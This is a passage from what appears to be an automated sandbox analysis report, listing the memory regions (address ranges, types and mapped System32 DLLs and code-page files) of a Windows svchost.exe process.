name = "private_0x0000000003b00000"
filename = ""
Region:
id = 1162
start_va = 0x3c00000
end_va = 0x3c7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003c00000"
filename = ""
Region:
id = 1163
start_va = 0x3c80000
end_va = 0x3cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003c80000"
filename = ""
Region:
id = 1164
start_va = 0x3d00000
end_va = 0x3d7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003d00000"
filename = ""
Region:
id = 1165
start_va = 0x3d80000
end_va = 0x3e7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003d80000"
filename = ""
Region:
id = 1166
start_va = 0x3e80000
end_va = 0x3f7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003e80000"
filename = ""
Region:
id = 1167
start_va = 0x3f80000
end_va = 0x407ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003f80000"
filename = ""
Region:
id = 1168
start_va = 0x4180000
end_va = 0x427ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004180000"
filename = ""
Region:
id = 1169
start_va = 0x4280000
end_va = 0x437ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004280000"
filename = ""
Region:
id = 1170
start_va = 0x4600000
end_va = 0x46fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004600000"
filename = ""
Region:
id = 1171
start_va = 0x4700000
end_va = 0x47fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004700000"
filename = ""
Region:
id = 1172
start_va = 0x4800000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004800000"
filename = ""
Region:
id = 1173
start_va = 0x4900000
end_va = 0x49fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004900000"
filename = ""
Region:
id = 1174
start_va = 0x4a00000
end_va = 0x4afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004a00000"
filename = ""
Region:
id = 1175
start_va = 0x4b00000
end_va = 0x4bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004b00000"
filename = ""
Region:
id = 1176
start_va = 0x4c00000
end_va = 0x4cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c00000"
filename = ""
Region:
id = 1177
start_va = 0x4d00000
end_va = 0x4dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 1178
start_va = 0x4e00000
end_va = 0x4efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e00000"
filename = ""
Region:
id = 1179
start_va = 0x4f00000
end_va = 0x4ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004f00000"
filename = ""
Region:
id = 1180
start_va = 0x5000000
end_va = 0x50fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005000000"
filename = ""
Region:
id = 1181
start_va = 0x5200000
end_va = 0x52fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005200000"
filename = ""
Region:
id = 1182
start_va = 0x5300000
end_va = 0x53fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005300000"
filename = ""
Region:
id = 1183
start_va = 0x5500000
end_va = 0x55fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005500000"
filename = ""
Region:
id = 1184
start_va = 0x5600000
end_va = 0x56fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005600000"
filename = ""
Region:
id = 1185
start_va = 0x5a40000
end_va = 0x5a46fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005a40000"
filename = ""
Region:
id = 1186
start_va = 0x5a50000
end_va = 0x5a50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msxml6r.dll"
filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll")
Region:
id = 1187
start_va = 0x5a60000
end_va = 0x5a60fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005a60000"
filename = ""
Region:
id = 1188
start_va = 0x5a70000
end_va = 0x5a7ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "winnlsres.dll.mui"
filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui")
Region:
id = 1189
start_va = 0x5a90000
end_va = 0x5aa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1256.nls"
filename = "\\Windows\\System32\\C_1256.NLS" (normalized: "c:\\windows\\system32\\c_1256.nls")
Region:
id = 1190
start_va = 0x5ab0000
end_va = 0x5ac0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1251.nls"
filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls")
Region:
id = 1191
start_va = 0x5ad0000
end_va = 0x5ae0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1254.nls"
filename = "\\Windows\\System32\\C_1254.NLS" (normalized: "c:\\windows\\system32\\c_1254.nls")
Region:
id = 1192
start_va = 0x5b00000
end_va = 0x5bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005b00000"
filename = ""
Region:
id = 1193
start_va = 0x5e00000
end_va = 0x5efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005e00000"
filename = ""
Region:
id = 1194
start_va = 0x5f00000
end_va = 0x5f10fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1250.nls"
filename = "\\Windows\\System32\\C_1250.NLS" (normalized: "c:\\windows\\system32\\c_1250.nls")
Region:
id = 1195
start_va = 0x5f20000
end_va = 0x5f30fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1253.nls"
filename = "\\Windows\\System32\\C_1253.NLS" (normalized: "c:\\windows\\system32\\c_1253.nls")
Region:
id = 1196
start_va = 0x5f40000
end_va = 0x5f50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1257.nls"
filename = "\\Windows\\System32\\C_1257.NLS" (normalized: "c:\\windows\\system32\\c_1257.nls")
Region:
id = 1197
start_va = 0x5f60000
end_va = 0x5f70fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1255.nls"
filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls")
Region:
id = 1198
start_va = 0x5f80000
end_va = 0x5fa7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_932.nls"
filename = "\\Windows\\System32\\C_932.NLS" (normalized: "c:\\windows\\system32\\c_932.nls")
Region:
id = 1199
start_va = 0x5fc0000
end_va = 0x5fc6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005fc0000"
filename = ""
Region:
id = 1200
start_va = 0x5fd0000
end_va = 0x60cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005fd0000"
filename = ""
Region:
id = 1201
start_va = 0x60d0000
end_va = 0x60e0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_874.nls"
filename = "\\Windows\\System32\\C_874.NLS" (normalized: "c:\\windows\\system32\\c_874.nls")
Region:
id = 1202
start_va = 0x6100000
end_va = 0x61fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006100000"
filename = ""
Region:
id = 1203
start_va = 0x6200000
end_va = 0x62fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006200000"
filename = ""
Region:
id = 1204
start_va = 0x6300000
end_va = 0x63fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006300000"
filename = ""
Region:
id = 1205
start_va = 0x6400000
end_va = 0x64fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006400000"
filename = ""
Region:
id = 1206
start_va = 0x6500000
end_va = 0x65fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006500000"
filename = ""
Region:
id = 1207
start_va = 0x6700000
end_va = 0x67fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006700000"
filename = ""
Region:
id = 1208
start_va = 0x6800000
end_va = 0x68fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006800000"
filename = ""
Region:
id = 1209
start_va = 0x6900000
end_va = 0x69fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006900000"
filename = ""
Region:
id = 1210
start_va = 0x6a00000
end_va = 0x6afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006a00000"
filename = ""
Region:
id = 1211
start_va = 0x6b00000
end_va = 0x6bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006b00000"
filename = ""
Region:
id = 1212
start_va = 0x6c00000
end_va = 0x6cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006c00000"
filename = ""
Region:
id = 1213
start_va = 0x6d00000
end_va = 0x6dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006d00000"
filename = ""
Region:
id = 1214
start_va = 0x6e00000
end_va = 0x6efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006e00000"
filename = ""
Region:
id = 1215
start_va = 0x7000000
end_va = 0x70fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007000000"
filename = ""
Region:
id = 1216
start_va = 0x7200000
end_va = 0x7230fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_949.nls"
filename = "\\Windows\\System32\\C_949.NLS" (normalized: "c:\\windows\\system32\\c_949.nls")
Region:
id = 1217
start_va = 0x7240000
end_va = 0x7250fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1258.nls"
filename = "\\Windows\\System32\\C_1258.NLS" (normalized: "c:\\windows\\system32\\c_1258.nls")
Region:
id = 1218
start_va = 0x7260000
end_va = 0x7290fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_936.nls"
filename = "\\Windows\\System32\\C_936.NLS" (normalized: "c:\\windows\\system32\\c_936.nls")
Region:
id = 1219
start_va = 0x72a0000
end_va = 0x72d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_950.nls"
filename = "\\Windows\\System32\\C_950.NLS" (normalized: "c:\\windows\\system32\\c_950.nls")
Region:
id = 1220
start_va = 0x7300000
end_va = 0x73fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007300000"
filename = ""
Region:
id = 1221
start_va = 0x7830000
end_va = 0x792ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007830000"
filename = ""
Region:
id = 1222
start_va = 0x7a30000
end_va = 0x7b2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007a30000"
filename = ""
Region:
id = 1223
start_va = 0x8430000
end_va = 0x852ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008430000"
filename = ""
Region:
id = 1224
start_va = 0x8930000
end_va = 0x8a2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008930000"
filename = ""
Region:
id = 1225
start_va = 0x8d30000
end_va = 0x8e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008d30000"
filename = ""
Region:
id = 1226
start_va = 0x8f30000
end_va = 0x902ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008f30000"
filename = ""
Region:
id = 1227
start_va = 0x9030000
end_va = 0x912ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009030000"
filename = ""
Region:
id = 1228
start_va = 0x9130000
end_va = 0x922ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009130000"
filename = ""
Region:
id = 1229
start_va = 0x9230000
end_va = 0x932ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009230000"
filename = ""
Region:
id = 1230
start_va = 0x9330000
end_va = 0x942ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009330000"
filename = ""
Region:
id = 1231
start_va = 0x9430000
end_va = 0x952ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009430000"
filename = ""
Region:
id = 1232
start_va = 0x9530000
end_va = 0x962ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009530000"
filename = ""
Region:
id = 1233
start_va = 0x9630000
end_va = 0x972ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009630000"
filename = ""
Region:
id = 1234
start_va = 0x9730000
end_va = 0x982ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009730000"
filename = ""
Region:
id = 1235
start_va = 0x9830000
end_va = 0x992ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009830000"
filename = ""
Region:
id = 1236
start_va = 0x9930000
end_va = 0x9a2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009930000"
filename = ""
Region:
id = 1237
start_va = 0x9a30000
end_va = 0x9b2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009a30000"
filename = ""
Region:
id = 1238
start_va = 0x9c30000
end_va = 0x9d2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009c30000"
filename = ""
Region:
id = 1239
start_va = 0x9d30000
end_va = 0x9e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009d30000"
filename = ""
Region:
id = 1240
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1241
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 1242
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 1243
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 1244
start_va = 0x7ff60e670000
end_va = 0x7ff60e67cfff
monitored = 0
entry_point = 0x7ff60e673980
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 1245
start_va = 0x7ffc41570000
end_va = 0x7ffc41586fff
monitored = 0
entry_point = 0x7ffc41577520
region_type = mapped_file
name = "usoapi.dll"
filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll")
Region:
id = 1246
start_va = 0x7ffc415b0000
end_va = 0x7ffc4185ffff
monitored = 0
entry_point = 0x7ffc415b1cf0
region_type = mapped_file
name = "netshell.dll"
filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll")
Region:
id = 1247
start_va = 0x7ffc41860000
end_va = 0x7ffc418a3fff
monitored = 0
entry_point = 0x7ffc418883e0
region_type = mapped_file
name = "updatehandlers.dll"
filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll")
Region:
id = 1248
start_va = 0x7ffc418b0000
end_va = 0x7ffc4190cfff
monitored = 0
entry_point = 0x7ffc418de510
region_type = mapped_file
name = "usocore.dll"
filename = "\\Windows\\System32\\usocore.dll" (normalized: "c:\\windows\\system32\\usocore.dll")
Region:
id = 1249
start_va = 0x7ffc43a40000
end_va = 0x7ffc43a51fff
monitored = 0
entry_point = 0x7ffc43a41a80
region_type = mapped_file
name = "bitsproxy.dll"
filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll")
Region:
id = 1250
start_va = 0x7ffc43a60000
end_va = 0x7ffc43a9efff
monitored = 0
entry_point = 0x7ffc43a882d0
region_type = mapped_file
name = "tcpipcfg.dll"
filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll")
Region:
id = 1251
start_va = 0x7ffc44a60000
end_va = 0x7ffc44a70fff
monitored = 0
entry_point = 0x7ffc44a628d0
region_type = mapped_file
name = "credentialmigrationhandler.dll"
filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll")
Region:
id = 1252
start_va = 0x7ffc44a80000
end_va = 0x7ffc44ab1fff
monitored = 0
entry_point = 0x7ffc44a8b0c0
region_type = mapped_file
name = "shacct.dll"
filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll")
Region:
id = 1253
start_va = 0x7ffc44db0000
end_va = 0x7ffc44dc7fff
monitored = 0
entry_point = 0x7ffc44db1b10
region_type = mapped_file
name = "locationframeworkinternalps.dll"
filename = "\\Windows\\System32\\LocationFrameworkInternalPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkinternalps.dll")
Region:
id = 1254
start_va = 0x7ffc44dd0000
end_va = 0x7ffc44decfff
monitored = 0
entry_point = 0x7ffc44dd4f60
region_type = mapped_file
name = "appinfo.dll"
filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll")
Region:
id = 1255
start_va = 0x7ffc45dd0000
end_va = 0x7ffc45edefff
monitored = 0
entry_point = 0x7ffc45e0c010
region_type = mapped_file
name = "dosvc.dll"
filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll")
Region:
id = 1256
start_va = 0x7ffc46030000
end_va = 0x7ffc46075fff
monitored = 0
entry_point = 0x7ffc460379a0
region_type = mapped_file
name = "adsldp.dll"
filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll")
Region:
id = 1257
start_va = 0x7ffc47160000
end_va = 0x7ffc47167fff
monitored = 0
entry_point = 0x7ffc471613b0
region_type = mapped_file
name = "dmiso8601utils.dll"
filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll")
Region:
id = 1258
start_va = 0x7ffc472e0000
end_va = 0x7ffc473fcfff
monitored = 0
entry_point = 0x7ffc4730fe60
region_type = mapped_file
name = "qmgr.dll"
filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll")
Region:
id = 1259
start_va = 0x7ffc49c60000
end_va = 0x7ffc49cc6fff
monitored = 0
entry_point = 0x7ffc49c6b160
region_type = mapped_file
name = "upnp.dll"
filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll")
Region:
id = 1260
start_va = 0x7ffc49cd0000
end_va = 0x7ffc49ce3fff
monitored = 0
entry_point = 0x7ffc49cd2a00
region_type = mapped_file
name = "bitsigd.dll"
filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll")
Region:
id = 1261
start_va = 0x7ffc4bc90000
end_va = 0x7ffc4bcc5fff
monitored = 0
entry_point = 0x7ffc4bc927f0
region_type = mapped_file
name = "windows.networking.hostname.dll"
filename = "\\Windows\\System32\\Windows.Networking.HostName.dll" (normalized: "c:\\windows\\system32\\windows.networking.hostname.dll")
Region:
id = 1262
start_va = 0x7ffc4bd50000
end_va = 0x7ffc4bd63fff
monitored = 0
entry_point = 0x7ffc4bd53710
region_type = mapped_file
name = "mskeyprotect.dll"
filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll")
Region:
id = 1263
start_va = 0x7ffc4bd70000
end_va = 0x7ffc4bd97fff
monitored = 0
entry_point = 0x7ffc4bd7efc0
region_type = mapped_file
name = "dssenh.dll"
filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll")
Region:
id = 1264
start_va = 0x7ffc4be00000
end_va = 0x7ffc4be1dfff
monitored = 0
entry_point = 0x7ffc4be0ef80
region_type = mapped_file
name = "ncryptsslp.dll"
filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll")
Region:
id = 1265
start_va = 0x7ffc4be20000
end_va = 0x7ffc4be35fff
monitored = 0
entry_point = 0x7ffc4be21af0
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")
Region:
id = 1266
start_va = 0x7ffc4be40000
end_va = 0x7ffc4be59fff
monitored = 0
entry_point = 0x7ffc4be42330
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")
Region:
id = 1267
start_va = 0x7ffc4be60000
end_va = 0x7ffc4be6cfff
monitored = 0
entry_point = 0x7ffc4be61420
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")
Region:
id = 1268
start_va = 0x7ffc4c140000
end_va = 0x7ffc4c1c3fff
monitored = 0
entry_point = 0x7ffc4c158d50
region_type = mapped_file
name = "wbemess.dll"
filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll")
Region:
id = 1269
start_va = 0x7ffc4c1d0000
end_va = 0x7ffc4c1e5fff
monitored = 0
entry_point = 0x7ffc4c1d55e0
region_type = mapped_file
name = "ncobjapi.dll"
filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")
Region:
id = 1270
start_va = 0x7ffc4c1f0000
end_va = 0x7ffc4c2c5fff
monitored = 0
entry_point = 0x7ffc4c21a800
region_type = mapped_file
name = "wmiprvsd.dll"
filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll")
Region:
id = 1271
start_va = 0x7ffc4c2d0000
end_va = 0x7ffc4c333fff
monitored = 0
entry_point = 0x7ffc4c2ebed0
region_type = mapped_file
name = "repdrvfs.dll"
filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll")
Region:
id = 1272
start_va = 0x7ffc4c340000
end_va = 0x7ffc4c364fff
monitored = 0
entry_point = 0x7ffc4c349900
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 1273
start_va = 0x7ffc4c370000
end_va = 0x7ffc4c383fff
monitored = 0
entry_point = 0x7ffc4c371800
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 1274
start_va = 0x7ffc4c390000
end_va = 0x7ffc4c485fff
monitored = 0
entry_point = 0x7ffc4c3c9590
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 1275
start_va = 0x7ffc4c490000
end_va = 0x7ffc4c503fff
monitored = 0
entry_point = 0x7ffc4c4a5eb0
region_type = mapped_file
name = "esscli.dll"
filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll")
Region:
id = 1276
start_va = 0x7ffc4c510000
end_va = 0x7ffc4c646fff
monitored = 0
entry_point = 0x7ffc4c550480
region_type = mapped_file
name = "wbemcore.dll"
filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll")
Region:
id = 1277
start_va = 0x7ffc4c650000
end_va = 0x7ffc4c65efff
monitored = 0
entry_point = 0x7ffc4c654960
region_type = mapped_file
name = "nci.dll"
filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll")
Region:
id = 1278
start_va = 0x7ffc4c680000
end_va = 0x7ffc4c8f9fff
monitored = 0
entry_point = 0x7ffc4c69a7a0
region_type = mapped_file
name = "msxml6.dll"
filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll")
Region:
id = 1279
start_va = 0x7ffc4c9c0000
end_va = 0x7ffc4c9cffff
monitored = 0
entry_point = 0x7ffc4c9c1690
region_type = mapped_file
name = "wups.dll"
filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll")
Region:
id = 1280
start_va = 0x7ffc4cc10000
end_va = 0x7ffc4cc20fff
monitored = 0
entry_point = 0x7ffc4cc17480
region_type = mapped_file
name = "tetheringclient.dll"
filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll")
Region:
id = 1281
start_va = 0x7ffc4dbb0000
end_va = 0x7ffc4dbc0fff
monitored = 0
entry_point = 0x7ffc4dbb2fc0
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 1282
start_va = 0x7ffc4dbd0000
end_va = 0x7ffc4dbedfff
monitored = 0
entry_point = 0x7ffc4dbd3a40
region_type = mapped_file
name = "atl.dll"
filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll")
Region:
id = 1283
start_va = 0x7ffc4dbf0000
end_va = 0x7ffc4dc71fff
monitored = 0
entry_point = 0x7ffc4dbf2a10
region_type = mapped_file
name = "hnetcfg.dll"
filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll")
Region:
id = 1284
start_va = 0x7ffc4dcd0000
end_va = 0x7ffc4dd0ffff
monitored = 0
entry_point = 0x7ffc4dcdcbe0
region_type = mapped_file
name = "adsldpc.dll"
filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll")
Region:
id = 1285
start_va = 0x7ffc4dd10000
end_va = 0x7ffc4dd56fff
monitored = 0
entry_point = 0x7ffc4dd11d10
region_type = mapped_file
name = "activeds.dll"
filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll")
Region:
id = 1286
start_va = 0x7ffc4dd60000
end_va = 0x7ffc4dda1fff
monitored = 0
entry_point = 0x7ffc4dd63670
region_type = mapped_file
name = "wdscore.dll"
filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll")
Region:
id = 1287
start_va = 0x7ffc4ddd0000
end_va = 0x7ffc4ddf1fff
monitored = 0
entry_point = 0x7ffc4dde2540
region_type = mapped_file
name = "updatepolicy.dll"
filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll")
Region:
id = 1288
start_va = 0x7ffc4de00000
end_va = 0x7ffc4ded4fff
monitored = 0
entry_point = 0x7ffc4de1cf80
region_type = mapped_file
name = "wuapi.dll"
filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll")
Region:
id = 1289
start_va = 0x7ffc4dfc0000
end_va = 0x7ffc4dffffff
monitored = 0
entry_point = 0x7ffc4dfd6c60
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")
Region:
id = 1290
start_va = 0x7ffc4e070000
end_va = 0x7ffc4e08efff
monitored = 0
entry_point = 0x7ffc4e0737e0
region_type = mapped_file
name = "netsetupapi.dll"
filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll")
Region:
id = 1291
start_va = 0x7ffc4e090000
end_va = 0x7ffc4e108fff
monitored = 0
entry_point = 0x7ffc4e0976a0
region_type = mapped_file
name = "netsetupshim.dll"
filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll")
Region:
id = 1292
start_va = 0x7ffc4e2f0000
end_va = 0x7ffc4e305fff
monitored = 0
entry_point = 0x7ffc4e2f1d50
region_type = mapped_file
name = "wwapi.dll"
filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll")
Region:
id = 1293
start_va = 0x7ffc4e310000
end_va = 0x7ffc4e327fff
monitored = 0
entry_point = 0x7ffc4e314e10
region_type = mapped_file
name = "adhsvc.dll"
filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll")
Region:
id = 1294
start_va = 0x7ffc4e330000
end_va = 0x7ffc4e354fff
monitored = 0
entry_point = 0x7ffc4e335ca0
region_type = mapped_file
name = "httpprxm.dll"
filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll")
Region:
id = 1295
start_va = 0x7ffc4e3c0000
end_va = 0x7ffc4e400fff
monitored = 0
entry_point = 0x7ffc4e3c3750
region_type = mapped_file
name = "sqmapi.dll"
filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll")
Region:
id = 1296
start_va = 0x7ffc4e410000
end_va = 0x7ffc4e502fff
monitored = 0
entry_point = 0x7ffc4e435d80
region_type = mapped_file
name = "iphlpsvc.dll"
